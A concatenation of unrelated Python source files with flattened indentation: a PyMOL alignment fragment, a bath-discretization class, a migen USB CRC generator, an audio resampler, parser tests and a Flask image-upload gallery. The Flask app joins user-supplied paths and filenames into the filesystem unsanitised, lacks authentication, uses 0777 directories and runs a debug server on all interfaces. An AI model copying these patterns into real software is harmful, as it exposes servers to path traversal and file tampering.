pm(f"disable %{target}")
pm(f"set cartoon_color, {color['mobile']}, all")
pm(f"set cartoon_color, {color['rigid']}, {entry}_fwk")
# Create labels...
entry_dict = { f"{v[7]}_{v[10]}" : i for i, v in enumerate(lines) }
# Selectively plot entries...
pdb_list = [ "3SN6_R" ]
entry_fil_dict = { k : entry_dict[k] for k in pdb_list if k in entry_dict }
for v in pdb_list[:]:
# Load a mobile structure...
pdb, chain = v.split("_")
entry = f"{pdb}"
pdb_path = os.path.join(drc, f"{entry}.pdb")
atoms_pdb = pr.atom.read(pdb_path)
atom_dict = pr.atom.create_lookup_table(atoms_pdb)
chain_dict = atom_dict[chain]
# Obtain seq string for the current chain...
tar_seq = seq_dict[f"{pdb.lower()}_{chain}"]
# Obtain the mapping from seqi to resi...
seqi_to_resi_dict = pr.atom.seqi_to_resi(chain_dict, tar_seq, nseqi, cseqi)
tar_seq_fil = tar_seq[ nseqi : cseqi + 1 ]
resi_min = seqi_to_resi_dict[nseqi + pr.fasta.get_lseqi(tar_seq_fil)]
resi_max = seqi_to_resi_dict[nseqi + pr.fasta.get_rseqi(tar_seq_fil)]
# Find all resi required for alignment...
fwk_resi = []
for b, e in fwk:
for i in range(b, e + 1):
seqi = nseqi + i
resi = seqi_to_resi_dict[seqi]
if resi is None: continue
fwk_resi.append(resi)
fwk_select[f"{pdb}_{chain}"] = '+'.join( [ str(i) for i in fwk_resi ] )
# Work on it
pm(f"load {pdb_path}")
pm(f"remove {entry} and not chain {chain}")
pm(f"remove {entry} and not polymer.protein")
pm(f"hide cartoon, {entry} and chain {chain}")
pm(f"show cartoon, {entry} and chain {chain} and resi {resi_min}-{resi_max}")
# Select the rigid framework from the mobile...
mobile = f"{entry}_fwk"
pm(f"select {mobile}, (%{entry} and {backbone_select}) and (resi {fwk_select[f'{pdb}_{chain}']})")
pm(f"disable %{mobile}")
pm(f"set cartoon_color, {color['mobile']}, all")
pm(f"set cartoon_color, {color['rigid']}, {entry}_fwk")
# Align...
pm(f"super {mobile}, {target}")
pm(f"orient")
input()
|
<filename>mapping/star/discretized_bath/asymmetric_mean.py
"""
Discretized bath for the generation of direct asymmetric discretization coefficients, where the integrals for
the couplings and energies are evaluated using a heuristic method called mean discretization.
Introduced in: de Vega et al., Phys. Rev. B 92, 155126 (2015)
"""
import numpy as np
from scipy.integrate import quad
from mapping.star.discretized_bath.base.asymmetric import BaseDiscretizedAsymmetricBath
from mapping.utils.integration_defaults import default_epsabs, default_epsrel, default_limit
from mapping.star.discretized_bath.stopcoeff import StopCoefficients
class MeanDiscretizedAsymmetricBath(BaseDiscretizedAsymmetricBath):
def __init__(self, J, domain, max_nof_coefficients=100, **kwargs):
"""
Generates direct discretization coefficients from a spectral density J, by
mean discretization (see de Vega et al., Phys. Rev. B 92, 155126 (2015) for details on the method)
Computes max_nof_coefficients coefficients directly!
:param J: Spectral density. A function defined on 'domain', must be >0 in the inner part of domain
:param domain: List/tuple of two elements for the left and right boundary of the domain of J
:param max_nof_coefficients: Size of the buffers which hold gamma and xi coefficients (maximum number of
these coefficients that can be calculated)
:param kwargs: may contain 'ignore_zeros' If one gamma_i is numerically 0, the corresponding xi_i is also set 0,
default is False
'epsabs': absolute tolerance for the scipy integrations, default is 1e-11
'epsrel': relative tolerance for the scipy integrations, default is 1e-11
'limit': limit parameter for the scipy quad function, default is 100
"""
assert not np.isinf(domain[1])
try:
self.ignore_zeros = kwargs['ignore_zeros']
except KeyError:
self.ignore_zeros = False
try:
self.epsabs = kwargs['epsabs']
except KeyError:
self.epsabs = default_epsabs
try:
self.epsrel = kwargs['epsrel']
except KeyError:
self.epsrel = default_epsrel
try:
self.limit = kwargs['limit']
except KeyError:
self.limit = default_limit
self.J = J
self.Jx = lambda x: J(x) * x
self.domain = domain
super().__init__(self.compute_coefficients, max_nof_coefficients=max_nof_coefficients)
try:
self.gamma_buf[:], self.xi_buf[:] = self.get_mean_coefficients(max_nof_coefficients)
except ZeroDivisionError:
print('Cannot calculate ' + str(max_nof_coefficients) + ' coefficients. Encountered div/0')
raise
self._set_next_n(max_nof_coefficients)
def get_interval_avg(self, a, b):
"""
Returns the average of J in the interval [1a, b]
"""
return quad(self.Jx, a=a, b=b, epsabs=self.epsabs, epsrel=self.epsrel, limit=self.limit)[0] / \
quad(self.J, a=a, b=b, epsabs=self.epsabs, epsrel=self.epsrel, limit=self.limit)[0]
def get_mean_coefficients(self, nof_coefficients):
"""
Calculates the mean discretization coefficients
"""
interval_points = np.empty(nof_coefficients+2)
# include the endpoints of the interval
interval_points[0] = self.domain[0]
interval_points[-1] = self.domain[1]
x0 = self.get_interval_avg(self.domain[0], self.domain[1])
interval_points[1] = x0
# iteratively determine the points, that divide J by equal weight
for n in range(2, nof_coefficients+1):
last_points = np.empty(n+1)
last_points[0] = self.domain[0]
last_points[-1] = self.domain[1]
last_points[1:-1] = interval_points[1:n]
for pt_idx in range(n):
interval_points[pt_idx+1] = self.get_interval_avg(last_points[pt_idx], last_points[pt_idx+1])
# Calculate the couplings in the above determined intervals
couplings = np.empty(nof_coefficients)
for pt_idx in range(1, nof_coefficients+1):
a = (interval_points[pt_idx-1] + interval_points[pt_idx])/2 if pt_idx > 1 else interval_points[0]
b = (interval_points[pt_idx] + interval_points[pt_idx+1])/2 if pt_idx < nof_coefficients else \
interval_points[nof_coefficients+1]
couplings[pt_idx-1] = np.sqrt(quad(self.J, a=a, b=b, epsabs=self.epsabs, epsrel=self.epsrel,
limit=self.limit)[0])
return couplings, interval_points[1:-1]
def compute_coefficients(self, stop_n):
"""
Immediately raises a StopCoefficients exception, because everything is already calculated in the constructor
"""
raise StopCoefficients
|
<gh_stars>100-1000
#!/usr/bin/env python3
import functools
import operator
import unittest
from migen import *
from migen.fhdl.decorators import CEInserter, ResetInserter
from ..utils.CrcMoose3 import CrcAlgorithm
from ..utils.packet import crc16, encode_data, b
from .shifter import TxShifter
from .tester import module_tester
from ..test.common import BaseUsbTestCase
@CEInserter()
@ResetInserter()
class TxSerialCrcGenerator(Module):
"""
Transmit CRC Generator
TxSerialCrcGenerator generates a running CRC.
https://www.pjrc.com/teensy/beta/usb20.pdf, USB2 Spec, 8.3.5
https://en.wikipedia.org/wiki/Cyclic_redundancy_check
Parameters
----------
Parameters are passed in via the constructor.
width : int
Width of the CRC.
polynomial : int
CRC polynomial in integer form.
initial : int
Initial value of the CRC register before data starts shifting in.
Input Ports
------------
i_data : Signal(1)
Serial data to generate CRC for.
Output Ports
------------
o_crc : Signal(width)
Current CRC value.
"""
def __init__(self, width, polynomial, initial):
self.i_data = Signal()
crc = Signal(width, reset=initial)
crc_invert = Signal(1)
self.comb += [
crc_invert.eq(self.i_data ^ crc[width - 1])
]
for i in range(width):
rhs_data = None
if i == 0:
rhs_data = crc_invert
else:
if (polynomial >> i) & 1:
rhs_data = crc[i - 1] ^ crc_invert
else:
rhs_data = crc[i - 1]
self.sync += [
crc[i].eq(rhs_data)
]
self.o_crc = Signal(width)
for i in range(width):
self.comb += [
self.o_crc[i].eq(1 ^ crc[width - i - 1]),
]
def bytes_to_int(d):
"""Convert a list of bytes to an int
Bytes are in LSB first.
>>> hex(bytes_to_int([0, 1]))
'0x100'
>>> hex(bytes_to_int([1, 2]))
'0x201'
"""
v = 0
for i,d in enumerate(d):
v |= d << (i*8)
return v
def cols(rows):
"""
>>> a = [
... [1, 2],
... ['a', 'b'],
... [4, 5],
... ]
>>> for c in cols(a):
... print(c)
[1, 'a', 4]
[2, 'b', 5]
>>> a = [
... [1, 2, 3],
... ['a', 'b', 'c'],
... ]
>>> for c in cols(a):
... print(c)
[1, 'a']
[2, 'b']
[3, 'c']
"""
all_c = []
for ci in range(len(rows[0])):
all_c.append([])
for ci in range(len(rows[0])):
for ri in range(len(rows)):
assert len(rows[ri]) == len(all_c), "len(%r) != %i" % (rows[ri], len(all_c))
all_c[ci].append(rows[ri][ci])
return all_c
def lfsr_serial_shift_crc(lfsr_poly, lfsr_cur, data):
"""
shift_by == num_data_bits
len(data_cur) == num_data_bits
>>> for i in range(5):
... l = [0]*5; l[i] = 1
... r = lfsr_serial_shift_crc(
... lfsr_poly=[0,0,1,0,1], # (5, 2, 0)
... lfsr_cur=l,
... data=[0,0,0,0],
... )
... print("Min[%i] =" % i, r)
Min[0] = [1, 0, 0, 0, 0]
Min[1] = [0, 0, 1, 0, 1]
Min[2] = [0, 1, 0, 1, 0]
Min[3] = [1, 0, 1, 0, 0]
Min[4] = [0, 1, 1, 0, 1]
>>> for i in range(4):
... d = [0]*4; d[i] = 1
... r = lfsr_serial_shift_crc(
... lfsr_poly=[0,0,1,0,1], # (5, 2, 0)
... lfsr_cur=[0,0,0,0,0],
... data=d,
... )
... print("Nin[%i] =" % i, r)
Nin[0] = [0, 0, 1, 0, 1]
Nin[1] = [0, 1, 0, 1, 0]
Nin[2] = [1, 0, 1, 0, 0]
Nin[3] = [0, 1, 1, 0, 1]
"""
lfsr_poly = lfsr_poly[::-1]
data = data[::-1]
shift_by = len(data)
lfsr_poly_size = len(lfsr_poly)
assert lfsr_poly_size > 1
assert len(lfsr_cur) == lfsr_poly_size
lfsr_next = list(lfsr_cur)
for j in range(shift_by):
lfsr_upper_bit = lfsr_next[lfsr_poly_size-1]
for i in range(lfsr_poly_size-1, 0, -1):
if lfsr_poly[i]:
lfsr_next[i] = lfsr_next[i-1] ^ lfsr_upper_bit ^ data[j]
else:
lfsr_next[i] = lfsr_next[i-1]
lfsr_next[0] = lfsr_upper_bit ^ data[j]
return list(lfsr_next[::-1])
def print_matrix(crc_width, cols_nin, cols_min):
"""
>>> crc_width = 5
>>> data_width = 4
>>> poly_list = [0, 0, 1, 0, 1]
>>> _, cols_nin, cols_min = build_matrix(poly_list, data_width)
>>> print_matrix(crc_width, cols_nin, cols_min)
0 d[ 0], , , d[ 3], , c[ 1], , , c[ 4]
1 , d[ 1], , , , , c[ 2], ,
2 d[ 0], , d[ 2], d[ 3], , c[ 1], , c[ 3], c[ 4]
3 , d[ 1], , d[ 3], , , c[ 2], , c[ 4]
4 , , d[ 2], , c[ 0], , , c[ 3],
"""
for i in range(crc_width):
text_xor = []
for j, use in enumerate(cols_nin[i]):
if use:
text_xor.append('d[%2i]' % j)
else:
text_xor.append(' ')
for j, use in enumerate(cols_min[i]):
if use:
text_xor.append('c[%2i]' % j)
else:
text_xor.append(' ')
print("{:4d} {}".format(i, ", ".join("{:>5s}".format(x) for x in text_xor).rstrip()))
def build_matrix(lfsr_poly, data_width):
"""
>>> print("\\n".join(build_matrix([0,0,1,0,1], 4)[0]))
lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 0], [1, 0, 0, 0]) = [0, 0, 1, 0, 1]
lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 0], [0, 1, 0, 0]) = [0, 1, 0, 1, 0]
lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 0], [0, 0, 1, 0]) = [1, 0, 1, 0, 0]
lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 0], [0, 0, 0, 1]) = [0, 1, 1, 0, 1]
<BLANKLINE>
lfsr([0, 0, 1, 0, 1], [1, 0, 0, 0, 0], [0, 0, 0, 0]) = [1, 0, 0, 0, 0]
lfsr([0, 0, 1, 0, 1], [0, 1, 0, 0, 0], [0, 0, 0, 0]) = [0, 0, 1, 0, 1]
lfsr([0, 0, 1, 0, 1], [0, 0, 1, 0, 0], [0, 0, 0, 0]) = [0, 1, 0, 1, 0]
lfsr([0, 0, 1, 0, 1], [0, 0, 0, 1, 0], [0, 0, 0, 0]) = [1, 0, 1, 0, 0]
lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 1], [0, 0, 0, 0]) = [0, 1, 1, 0, 1]
<BLANKLINE>
Mout[4] = [0, 0, 1, 0] [1, 0, 0, 1, 0]
Mout[3] = [0, 1, 0, 1] [0, 0, 1, 0, 1]
Mout[2] = [1, 0, 1, 1] [0, 1, 0, 1, 1]
Mout[1] = [0, 1, 0, 0] [0, 0, 1, 0, 0]
Mout[0] = [1, 0, 0, 1] [0, 1, 0, 0, 1]
"""
lfsr_poly_size = len(lfsr_poly)
# data_width*lfsr_polysize matrix == lfsr(0,Nin)
rows_nin = []
# (a) calculate the N values when Min=0 and Build NxM matrix
# - Each value is one hot encoded (there is only one bit)
# - IE N=4, 0x1, 0x2, 0x4, 0x8
# - Mout = F(Nin,Min=0)
# - Each row contains the results of (a)
# - IE row[0] == 0x1, row[1] == 0x2
# - Output is M-bit wide (CRC width)
# - Each column of the matrix represents an output bit Mout[i] as a function of Nin
info = []
for i in range(data_width):
# lfsr_cur = [0,...,0] = Min
lfsr_cur = [0,]*lfsr_poly_size
# data = [0,..,1,..,0] = Nin
data = [0,]*data_width
data[i] = 1
# Calculate the CRC
rows_nin.append(lfsr_serial_shift_crc(lfsr_poly, lfsr_cur, data))
info.append("lfsr(%r, %r, %r) = %r" % (lfsr_poly, lfsr_cur, data, rows_nin[-1]))
assert len(rows_nin) == data_width
cols_nin = cols(rows_nin)[::-1]
# lfsr_polysize*lfsr_polysize matrix == lfsr(Min,0)
info.append("")
rows_min = []
for i in range(lfsr_poly_size):
# lfsr_cur = [0,..,1,...,0] = Min
lfsr_cur = [0,]*lfsr_poly_size
lfsr_cur[i] = 1
# data = [0,..,0] = Nin
data = [0,]*data_width
# Calculate the crc
rows_min.append(lfsr_serial_shift_crc(lfsr_poly, lfsr_cur, data))
info.append("lfsr(%r, %r, %r) = %r" % (lfsr_poly, lfsr_cur, data, rows_min[-1]))
assert len(rows_min) == lfsr_poly_size
cols_min = cols(rows_min)[::-1]
# (c) Calculate CRC for the M values when Nin=0 and Build MxM matrix
# - Each value is one hot encoded
# - Mout = F(Nin=0,Min)
# - Each row contains results from (7)
info.append("")
for i in range(data_width, -1, -1):
info.append("Mout[%i] = %r %r" % (i, cols_nin[i], cols_min[i]))
return info, cols_nin, cols_min
@ResetInserter()
class TxParallelCrcGenerator(Module):
"""
Transmit CRC Generator
TxParallelCrcGenerator generates a running CRC.
https://www.pjrc.com/teensy/beta/usb20.pdf, USB2 Spec, 8.3.5
https://en.wikipedia.org/wiki/Cyclic_redundancy_check
Parameters
----------
Parameters are passed in via the constructor.
width : int
Width of the CRC.
polynomial : int
CRC polynomial in integer form.
initial : int
Initial value of the CRC register before data starts shifting in.
Input Ports
------------
i_data_payload : Signal(8)
Byte wide data to generate CRC for.
i_data_strobe : Signal(1)
Strobe signal for the payload.
Output Ports
------------
o_crc : Signal(width)
Current CRC value.
"""
def __init__(self, data_width, crc_width, polynomial, initial=0):
self.i_data_payload = Signal(data_width)
self.i_data_strobe = Signal()
self.o_crc = Signal(crc_width)
crc_dat = Signal(data_width)
crc_cur = Signal(crc_width, reset=initial)
crc_next = Signal(crc_width, reset_less=True)
crc_cur_reset_bits = [
int(i) for i in "{0:0{width}b}".format(
crc_cur.reset.value,width=crc_width)[::-1]]
self.comb += [
crc_dat.eq(self.i_data_payload[::-1]),
# FIXME: Is XOR ^ initial actually correct here?
self.o_crc.eq(crc_cur[::-1] ^ initial),
]
self.sync += [
If(self.i_data_strobe,
crc_cur.eq(crc_next),
),
]
poly_list = []
for i in range(crc_width):
poly_list.insert(0, polynomial >> i & 0x1)
assert len(poly_list) == crc_width
_, cols_nin, cols_min = build_matrix(poly_list, data_width)
crc_next_reset_bits = list(crc_cur_reset_bits)
for i in range(crc_width):
to_xor = []
crc_next_reset_bit_i = []
for j, use in enumerate(cols_nin[i]):
if use:
to_xor.append(crc_dat[j])
crc_next_reset_bit_i.append(0)
for j, use in enumerate(cols_min[i]):
if use:
to_xor.append(crc_cur[j])
crc_next_reset_bit_i.append(crc_cur_reset_bits[j])
crc_next_reset_bits[i] = functools.reduce(operator.xor, crc_next_reset_bit_i)
self.comb += [
crc_next[i].eq(functools.reduce(operator.xor, to_xor)),
]
crc_next_reset_value = int("0b"+"".join(str(i) for i in crc_next_reset_bits[::-1]), 2)
crc_next.reset.value = crc_next_reset_value
class TxCrcPipeline(Module):
def __init__(self):
self.i_data_payload = Signal(8)
self.o_data_ack = Signal()
self.o_crc16 = Signal(16)
self.reset = reset = Signal()
reset_n1 = Signal()
reset_n2 = Signal()
self.ce = ce = Signal()
self.sync += [
reset_n2.eq(reset_n1),
reset_n1.eq(reset),
]
self.submodules.shifter = shifter = TxShifter(width=8)
self.comb += [
shifter.i_data.eq(self.i_data_payload),
shifter.reset.eq(reset),
shifter.ce.eq(ce),
self.o_data_ack.eq(shifter.o_get),
]
self.submodules.crc = crc_calc = TxSerialCrcGenerator(
width = 16,
polynomial = 0b1000000000000101,
initial = 0b1111111111111111,
)
self.comb += [
crc_calc.i_data.eq(shifter.o_data),
crc_calc.reset.eq(reset_n2),
crc_calc.ce.eq(ce),
self.o_crc16.eq(crc_calc.o_crc),
]
|
<reponame>tuxu/soundbridge<filename>soundbridge.py<gh_stars>0
from __future__ import print_function, division
import numpy as np
import sounddevice as sd
import samplerate as sr
from fifo import FIFO
class OutputProcessor(object):
"""Basic output processor.
Passes samples through by multiplying with `input_gain` and `output_volume`.
"""
def __init__(self, input_gain=1.0, output_volume=1.0):
self._input_gain = input_gain
self._output_volume = output_volume
@property
def input_gain(self):
"""Input gain."""
return self._input_gain
@input_gain.setter
def input_gain(self, gain):
self._input_gain = gain
@property
def output_volume(self):
"""Output volume."""
return self._output_volume
@output_volume.setter
def output_volume(self, volume):
self._output_volume = volume
def process(self, samples, _samplerate, **_kwargs):
"""Process output samples."""
return self.output_volume * self.input_gain * samples
class FMOutputProcessor(OutputProcessor):
"""Frequency modulating output processor.
Modulates samples onto a carrier frequency.
"""
def __init__(self, input_gain=1.0, output_volume=1.0, carrier_frequency=500):
super(FMOutputProcessor, self).__init__(input_gain, output_volume)
self._carrier_frequency = carrier_frequency
self._last_fmphase = 0
@property
def carrier_frequency(self):
"""Carrier frequency (Hz)."""
return self._carrier_frequency
@carrier_frequency.setter
def carrier_frequency(self, frequency):
self._carrier_frequency = frequency
def process(self, samples, samplerate, **kwargs):
"""Perform frequency modulation with samples and return output samples.
"""
samples = self.input_gain * samples
time = (kwargs['time'].outputBufferDacTime +
np.arange(samples.size) / samplerate)
phase = 2 * np.pi * self.carrier_frequency * time
fmphase = (self._last_fmphase +
2 * np.pi * np.cumsum(samples) / samplerate)
output_samples = np.cos(phase + fmphase)
self._last_fmphase = fmphase[-1]
return self.output_volume * output_samples
class Soundbridge(object):
"""Bridge a sample producer to the sound output, resampling as required.
"""
def __init__(self, input_samplerate, output_samplerate=None, bufsize=4096,
converter_type='sinc_fastest'):
if output_samplerate is None:
default_output = sd.default.device[1]
device_parameters = sd.query_devices(default_output)
output_samplerate = device_parameters['default_samplerate']
self._output_samplerate = output_samplerate
self._fifo = FIFO(bufsize)
ratio = output_samplerate / input_samplerate
self._resampler = sr.CallbackResampler(self._read_fifo, ratio,
converter_type)
self._outstream = sd.OutputStream(
channels=1, samplerate=output_samplerate,
callback=self._output_callback)
self._last_fmphase = 0
self._output_processor = OutputProcessor()
@property
def output_processor(self):
"""Output processor."""
return self._output_processor
@output_processor.setter
def output_processor(self, fun):
self._output_processor = fun
def push_samples(self, samples):
"""Push samples into the input buffer."""
self._fifo.write(samples)
def _read_fifo(self):
"""Input callback."""
frames = self._fifo.num_available()
if frames == 0:
# Return at least a single frame when the buffer is empty.
return [0]
return self._fifo.read(frames)
def _output_callback(self, outdata, frames, time, status):
"""Output callback.
Read samples from the resampler, turn them into output samples (via an
output processor), and write them into the output buffer `outdata`.
"""
samples = self._resampler.read(frames)
samples = np.pad(samples, (0, frames - len(samples)), mode='constant')
outdata[:, 0] = self._output_processor.process(
samples, self._output_samplerate, time=time, status=status)
def start(self):
"""Start output stream."""
self._outstream.start()
def stop(self):
"""Stop output stream."""
self._outstream.stop()
def __enter__(self):
self.start()
return self
def __exit__(self, *args):
self.stop()
self._outstream.close()
|
<gh_stars>0
"""
@author <NAME> (github.com/CorentinGoet)
"""
import unittest
from AST import *
from lexer_pkg.lexem import Lexem, LexemTag
from lexer_pkg.lexer import Lexer
from parser_pkg.parser import Parser
class ParserTest(unittest.TestCase):
"""
Test class for the parser_pkg.
"""
def setUp(self):
"""
Set up the test.
"""
self.parser = Parser()
self.lexer = Lexer()
def testPeek(self):
"""
Test the peek function.
"""
lexem = Lexem("123", LexemTag.INTEGER, [1, 0])
self.parser.lexems = [lexem]
self.assertEqual(self.parser.peek(), lexem)
self.parser.lexems = []
self.assertRaises(ValueError, self.parser.peek)
def testExpectAccept(self):
"""
Test the expect function.
"""
lexem = Lexem("123", LexemTag.INTEGER, [1, 0])
self.parser.lexems = [lexem]
self.assertEqual(self.parser.expect(LexemTag.INTEGER), lexem)
self.assertEqual(self.parser.lexems, [])
self.parser.lexems = [lexem]
self.assertRaises(TypeError, self.parser.expect, LexemTag.CHAR)
def test_parse_program(self):
"""
Test the parse_program function.
"""
f = open("test_sources/test_program.minic", "r")
source_code = f.read()
f.close()
self.lexer.tokenize(source_code)
self.parser.parse(self.lexer.lexems)
self.assertEqual(self.parser.lexems, [])
self.assertEqual(self.parser.ast, Program(Declarations([]), Statements([])))
def test_parse_declarations(self):
"""
Test the parse_declarations function.
"""
f = open("test_sources/test_declarations.minic", "r")
source_code = f.read()
f.close()
self.lexer.tokenize(source_code)
self.parser.parse(self.lexer.lexems)
self.assertEqual(self.parser.lexems, [])
declarations = Declarations([Declaration(Type(Types.INT), [Identifier("a")]),
Declaration(Type(Types.INT), [Identifier("bTest2Var"), Identifier("c")]),
Declaration(Type(Types.FLOAT), [Identifier("d")]),
Declaration(Type(Types.FLOAT), [Identifier("e"), Identifier("f2Test")]),
Declaration(Type(Types.CHAR), [Identifier("h")]),
Declaration(Type(Types.CHAR), [Identifier("i"), Identifier("jTestVar")]),
Declaration(Type(Types.BOOL), [Identifier("aTestVar")]),
Declaration(Type(Types.BOOL), [Identifier("b"), Identifier("cTest2Var")])])
self.assertEqual(self.parser.ast.declarations, declarations)
# Test the parse_declarations function with a wrong declaration
f = open("test_sources/test_declaration_error.minic", "r")
source_code = f.read()
f.close()
self.lexer.tokenize(source_code)
self.assertRaises(TypeError, self.parser.parse, self.lexer.lexems)
def test_parse_assignment(self):
"""
Test the parse_assignment function.
"""
f = open("test_sources/test_assignment.minic", "r")
source_code = f.read()
f.close()
self.lexer.tokenize(source_code)
self.parser.parse(self.lexer.lexems)
self.assertEqual(self.parser.lexems, [])
def test_parse_if(self):
"""
Test the parse_ifStatement function.
"""
f = open("test_sources/test_ifStatement.minic", "r")
source_code = f.read()
f.close()
self.lexer.tokenize(source_code)
self.parser.parse(self.lexer.lexems)
def test_parse_while(self):
"""
Test the parse_whileStatement function.
"""
f = open("test_sources/test_whileStatement.minic", "r")
source_code = f.read()
f.close()
self.lexer.tokenize(source_code)
self.parser.parse(self.lexer.lexems)
self.assertEqual(self.parser.lexems, [])
def test_parse_operators(self):
"""
Test the parsing of operators.
"""
f = open("test_sources/test_operators.minic", "r")
source_code = f.read()
f.close()
self.lexer.tokenize(source_code)
self.parser.parse(self.lexer.lexems)
self.assertEqual(self.parser.lexems, [])
# test operator errors
f = open("test_sources/test_operator_error.minic", "r")
source_code = f.read()
f.close()
self.lexer.tokenize(source_code)
self.assertRaises(TypeError, self.parser.parse, self.lexer.lexems)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import os
import os.path
import shutil
import sys
import re
import socket
from flask import current_app, Flask, jsonify, render_template, request, send_from_directory, redirect, url_for, got_request_exception
from flask.views import MethodView
from PIL import Image, ExifTags
__version__ = '0.0.4'
# Config
##################
BASE_DIR = '/home/kepek'
IMAGE_DIR = os.path.join(BASE_DIR, 'images')
THUMB_DIR = os.path.join(BASE_DIR, 'thumbnails')
CHUNKS_DIR = os.path.join(BASE_DIR, 'chunks')
THUMB_WIDTH = 250
THUMB_HEIGHT = 200
app = Flask(__name__, static_url_path='')
app.config.from_object(__name__)
# Utils
##################
def make_response(status=200, content=None):
""" Construct a response to an upload request.
Success is indicated by a status of 200 and { "success": true }
contained in the content.
Also, content-type is text/plain by default since IE9 and below chokes
on application/json. For CORS environments and IE9 and below, the
content-type needs to be text/html.
"""
return current_app.response_class(json.dumps(content,
indent=None if request.is_xhr else 2), mimetype='text/plain')
def handle_upload(f, attrs, path):
chunked = False
dest_folder = os.path.join(app.config['IMAGE_DIR'], path)
dest = os.path.join(dest_folder, attrs['qqfilename'])
# Chunked
if attrs.has_key('qqtotalparts') and int(attrs['qqtotalparts']) > 1:
chunked = True
dest_folder = os.path.join(app.config['CHUNKS_DIR'], attrs['qquuid'])
dest = os.path.join(dest_folder, attrs['qqfilename'], str(attrs['qqpartindex']))
save_upload(f, dest)
if chunked and (int(attrs['qqtotalparts']) - 1 == int(attrs['qqpartindex'])):
combine_chunks(attrs['qqtotalparts'],
attrs['qqtotalfilesize'],
source_folder=os.path.dirname(dest),
dest=os.path.join(app.config['IMAGE_DIR'], path, attrs['qqfilename'])
)
shutil.rmtree(os.path.dirname(os.path.dirname(dest)))
def save_upload(f, path):
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
with open(path, 'wb+') as destination:
destination.write(f.read())
def combine_chunks(total_parts, total_size, source_folder, dest):
if not os.path.exists(os.path.dirname(dest)):
os.makedirs(os.path.dirname(dest))
with open(dest, 'wb+') as destination:
for i in xrange(int(total_parts)):
part = os.path.join(source_folder, str(i))
with open(part, 'rb') as source:
destination.write(source.read())
def flip_horizontal(im): return im.transpose(Image.FLIP_LEFT_RIGHT)
def flip_vertical(im): return im.transpose(Image.FLIP_TOP_BOTTOM)
def rotate_180(im): return im.transpose(Image.ROTATE_180)
def rotate_90(im): return im.transpose(Image.ROTATE_90)
def rotate_270(im): return im.transpose(Image.ROTATE_270)
def transpose(im): return rotate_90(flip_horizontal(im))
def transverse(im): return rotate_90(flip_vertical(im))
orientation_funcs = [None,
lambda x: x,
flip_horizontal,
rotate_180,
flip_vertical,
transpose,
rotate_270,
transverse,
rotate_90
]
def apply_orientation(im):
"""
Extract the oritentation EXIF tag from the image, which should be a PIL Image instance,
and if there is an orientation tag that would rotate the image, apply that rotation to
the Image instance given to do an in-place rotation.
:param Image im: Image instance to inspect
:return: A possibly transposed image instance
"""
try:
kOrientationEXIFTag = 0x0112
if hasattr(im, '_getexif'): # only present in JPEGs
e = im._getexif() # returns None if no EXIF data
if e is not None:
#log.info('EXIF data found: %r', e)
orientation = e[kOrientationEXIFTag]
f = orientation_funcs[orientation]
return f(im)
except:
# We'd be here with an invalid orientation value or some random error?
#pass # log.exception("Error applying EXIF Orientation tag")
app.logger.debug('Image orienattion processing error')
return im
@app.before_first_request
def init_rollbar():
reload(sys)
sys.setdefaultencoding('utf-8')
rollbar_token = os.environ.get('ROLLBAR_TOKEN', None)
if rollbar_token:
import rollbar
import rollbar.contrib.flask
"""init rollbar module"""
rollbar.init(
rollbar_token,
'production',
root=os.path.dirname(os.path.realpath(__file__)),
allow_logging_basic_config=False
)
got_request_exception.connect(rollbar.contrib.flask.report_exception, app)
# Views
##################
@app.route("/")
def index():
return redirect(url_for('list_dir'))
@app.route('/list/', defaults={'path': ''})
@app.route('/list/<path:path>')
def list_dir(path):
dirs = []
files = []
dir = os.path.join( app.config['IMAGE_DIR'], path )
for i in os.listdir( dir ):
if os.path.isdir( os.path.join(dir, i) ):
dirs.append(i)
elif os.path.isfile( os.path.join(dir, i) ):
files.append(i)
dirs.sort()
files.sort()
return render_template('list.html', dirs=dirs, basedir=path, parentdir=os.path.dirname(path.rstrip('/'))+'/', files=files, version=__version__)
@app.route('/static/<path:path>')
def send_static(path):
return send_from_directory('static', path)
@app.route('/thumbnails/<path:path>')
def send_thumbnails(path):
if not os.path.isfile( os.path.join(THUMB_DIR, path) ):
app.logger.debug('No thumbnail found')
image_path = os.path.join(IMAGE_DIR, re.sub('_thumbnail\.jpg$', '', path) )
if os.path.isfile( image_path ):
app.logger.debug('Generating thumbnail')
thumbdir = os.path.dirname(os.path.join(THUMB_DIR, path))
if not os.path.exists( thumbdir ):
os.makedirs( thumbdir, 0777 )
try:
image = Image.open(image_path)
except:
return redirect(u'/static/document.png')
width = app.config['THUMB_WIDTH']
height = app.config['THUMB_HEIGHT']
image = apply_orientation(image)
if image.size[0] > width or image.size[1] > height:
if image.size[0] > image.size[1]:
scale_with = float(width) / float(image.size[0])
newsize = (width, int(image.size[1] * scale_with))
else:
scale_with = float(height) / float(image.size[1])
newsize = (int(image.size[0] * scale_with), height)
#image = image.resize(newsize, Image.ANTIALIAS)
image.thumbnail(newsize, Image.ANTIALIAS)
image.save(os.path.join(THUMB_DIR, path), format='JPEG', optimize=True)
else:
app.logger.debug('No image found, %s', image_path)
return send_from_directory(THUMB_DIR, path)
@app.route('/images/<path:path>')
def send_images(path):
return send_from_directory(IMAGE_DIR, path)
@app.route('/upload/', defaults={'path': ''}, methods=['POST'])
@app.route('/upload/<path:path>', methods=['POST'])
def upload(path):
handle_upload(request.files['qqfile'], request.form, path)
return make_response(200, { "success": True })
@app.route('/newdir', methods=['POST'])
def newdir():
dirname = request.form.get('dirname', type=str, default=None)
basedir = request.form.get('basedir', type=str, default='')
app.logger.debug( dirname )
if dirname is not None:
if not os.path.isdir( os.path.join( app.config['IMAGE_DIR'], basedir, dirname) ):
app.logger.debug('Creating dir: %s%s', basedir, dirname)
os.mkdir( os.path.join( app.config['IMAGE_DIR'], basedir, dirname), 0770)
return redirect(u'/list/{}'.format(basedir))
@app.route('/errortest')
def errortest():
return 1 / 0
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=8080)
else:
application = app
|
<reponame>rainprob/GibsonEnv<filename>examples/train/train_husky_gibson_flagrun_ppo1.py
